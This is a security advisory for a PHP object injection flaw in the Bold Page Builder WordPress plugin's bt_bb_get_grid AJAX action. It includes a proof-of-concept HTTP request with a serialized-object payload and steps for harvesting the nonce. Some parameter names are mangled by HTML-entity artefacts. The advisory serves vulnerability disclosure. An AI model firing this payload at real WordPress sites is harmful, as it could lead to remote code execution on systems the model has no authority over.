Bold Page Builder < 3.1.6 - PHP Object Injection

The bt_bb_get_grid AJAX action of the plugin passes user input into the unserialize() function without any validation or sanitisation, which could lead to a PHP Object Injection. Even though the plugin did not contain a suitable gadget to fully exploit the issue, other installed plugins on the blog could allow such issue to be exploited and lead to RCE in some cases. This object injection is possible under the following circumstances: 1. A Page exists with a Masonry Post Grid. This post grid is a element, which can be added over the page builder inside a column. 2. The attacker must have access to that page This requirements are in place because the vulnerable ajax callback function is protected by a nonce. This nonce is stored inside the post grid element. The ajax callback function can be called by unauthenticated users.

PoC

1. (This is to simulate a vulnerable Gadget chain for the Object Injection). Insert the following class inside bold-builder.php class INJECTED_CLASS { public function __destruct(){ echo “OBJECT INJECTED”;die(); } } 2. Get the nonce from a page with a Masonry Post Grid in (to create that: add/edit a post, switch editor to Bold Builder, and add the Masonry Post Grid inside a column) The nonce is in the data-bt-bb-masonry-post-grid-nonce attribute POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 245 Connection: close action=bt_bb_get_grid&number;=1000&category;&show;=a%253A2%253A%257Bi%253A1%253BO%253A14%253A%2522INJECTED_CLASS%2522%253A0%253A%257B%257Di%253A1%253Bs%253A1%253A%2522a%2522%253B%257D&bt-bb-masonry-post-grid-nonce;=&post-type;=post&offset;=0